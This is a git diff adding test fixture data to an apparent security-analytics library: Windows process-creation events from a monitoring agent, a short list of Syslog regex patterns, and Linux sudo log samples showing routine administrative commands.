+342,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbe8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:24.003
+343,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x130c,C:\Windows\System32\conhost.exe,%%1936,0xbe8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:24.020
+344,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:25.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1040,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:25.490
+345,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1370,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:26.000
+346,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:53:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x8e4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:53:26.000
+347,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:24.003
+348,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1298,C:\Windows\System32\conhost.exe,%%1936,0x10fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:24.020
+349,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:25.557,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x7f8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:25.557
+350,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf94,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:26.007
+351,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:57:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:57:26.000
+352,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa84,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:24.013
+353,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1348,C:\Windows\System32\conhost.exe,%%1936,0xa84,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:24.030
+354,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:25.427,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe34,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:25.427
+355,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:26.010
+356,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:24.523,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe"" -PerfMode optimize -quickscan -event -json -alldetectors",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:24.523
+357,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1148,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:26.007
+358,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:28.157,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xde8,C:\Windows\System32\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e5,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:28.157
+359,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:24.017
+360,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:24.033,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1338,C:\Windows\System32\conhost.exe,%%1936,0xc08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:24.033
+361,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:25.800,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:25.800
+362,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6d4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:26.007
diff --git a/tests/testdata/risky_stuff_custom.json b/tests/testdata/risky_stuff_custom.json
new file mode 100644
index 000000000..5fb262436
--- /dev/null
+++ b/tests/testdata/risky_stuff_custom.json
@@ -0,0 +1,7 @@
+{
+    "Syslog": [
+        ".*squid.*",
+        ".*apt.get.*",
+        ".*pam_unix.*"
+    ]
+}
\ No newline at end of file
diff --git a/tests/testdata/sent_incidents.pkl b/tests/testdata/sent_incidents.pkl
new file mode 100644
index 000000000..3e4c70c3b
Binary files /dev/null and b/tests/testdata/sent_incidents.pkl differ
diff --git a/tests/testdata/sudo_data.csv b/tests/testdata/sudo_data.csv
new file mode 100644
index 000000000..01cb24471
--- /dev/null
+++ b/tests/testdata/sudo_data.csv
@@ -0,0 +1,23 @@
+TenantId,SourceSystem,TimeGenerated,Computer,EventTime,Facility,HostName,SeverityLevel,SyslogMessage,ProcessID,HostIP,ProcessName,MG,Type,_ResourceId,SudoResult,Sudoer,SudoTo,Command,CommandCall
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-10T15:13:25.813Z,squid-uk-02,2019-07-10T15:13:25Z,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/sbin/squid,null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/sbin/squid,/usr/sbin/squid
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-10T15:13:25.817Z,squid-uk-02,2019-07-10T15:13:25Z,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:09.07Z,squid-uk-02,2019-07-05T18:04:09Z,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:09.07Z,squid-uk-02,2019-07-05T18:04:09Z,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/apt-get install auditd,null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/bin/apt-get install auditd,/usr/bin/apt-get
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:06:43.577Z,squid-uk-02,2019-07-05T18:06:43Z,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:06:43.577Z,squid-uk-02,2019-07-05T18:06:43Z,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/var/log/audit   USER=root   COMMAND=/opt/microsoft/omsagent/bin/service_control restart,null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/opt/microsoft/omsagent/bin/service_control restart,/opt/microsoft/omsagent/bin/service_control
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:10:09.097Z,squid-uk-02,2019-07-05T18:10:09Z,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/var/log/audit   USER=omsagent   COMMAND=/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py,null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py,/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:10:09.1Z,squid-uk-02,2019-07-05T18:10:09Z,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user omsagent by peteb(uid=0),null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,omsagent,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:18:35.133Z,UbuntuDevEnv,2019-07-05T18:18:35Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/top,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/top,/usr/bin/top
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:18:35.137Z,UbuntuDevEnv,2019-07-05T18:18:35Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:19:34.567Z,UbuntuDevEnv,2019-07-05T18:19:34Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:19:34.567Z,UbuntuDevEnv,2019-07-05T18:19:34Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/crontab -l,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/crontab -l,/usr/bin/crontab
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:19:52.873Z,UbuntuDevEnv,2019-07-05T18:19:52Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/bin/bash,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/bin/bash,/bin/bash
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:19:52.877Z,UbuntuDevEnv,2019-07-05T18:19:52Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:20:48.813Z,UbuntuDevEnv,2019-07-05T18:20:48Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/apt-get update,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/apt-get update,/usr/bin/apt-get
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:20:48.817Z,UbuntuDevEnv,2019-07-05T18:20:48Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:20:57.58Z,UbuntuDevEnv,2019-07-05T18:20:57Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:20:57.58Z,UbuntuDevEnv,2019-07-05T18:20:57Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/apt-get upgrade -y,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/apt-get upgrade -y,/usr/bin/apt-get
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:28:44.557Z,UbuntuDevEnv,2019-07-05T18:28:44Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/var/log/audit   USER=root   COMMAND=/usr/bin/top,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/top,/usr/bin/top
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:28:44.56Z,UbuntuDevEnv,2019-07-05T18:28:44Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:29:11.453Z,UbuntuDevEnv,2019-07-05T18:29:11Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/var/log/audit   USER=root   COMMAND=/bin/netstat -antp,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/bin/netstat -antp,/bin/netstat
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:29:11.453Z,UbuntuDevEnv,2019-07-05T18:29:11Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
diff --git a/tests/testdata/sudo_data_speed.csv b/tests/testdata/sudo_data_speed.csv
new file mode 100644
index 000000000..ae5147988
--- /dev/null
+++ b/tests/testdata/sudo_data_speed.csv
@@ -0,0 +1,23 @@
+TenantId,SourceSystem,TimeGenerated,Computer,EventTime,Facility,HostName,SeverityLevel,SyslogMessage,ProcessID,HostIP,ProcessName,MG,Type,_ResourceId,SudoResult,Sudoer,SudoTo,Command,CommandCall
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-10T15:13:25.813Z,squid-uk-02,2019-07-10T15:13:25Z,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/sbin/squid,null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/sbin/squid,/usr/sbin/squid
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-10T15:13:25.817Z,squid-uk-02,2019-07-10T15:13:25Z,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:09.07Z,squid-uk-02,2019-07-05T18:04:09Z,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:09.07Z,squid-uk-02,2019-07-05T18:04:09Z,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/apt-get install auditd,null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/bin/apt-get install auditd,/usr/bin/apt-get
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:06:43.577Z,squid-uk-02,2019-07-05T18:06:43Z,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:09.07Z,squid-uk-02,2019-07-05T18:06:43Z,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/var/log/audit   USER=root   COMMAND=/opt/microsoft/omsagent/bin/service_control restart,null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/opt/microsoft/omsagent/bin/service_control restart,/opt/microsoft/omsagent/bin/service_control
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:10.07Z,squid-uk-02,2019-07-05T18:10:09Z,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/var/log/audit   USER=omsagent   COMMAND=/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py,null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py,/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py
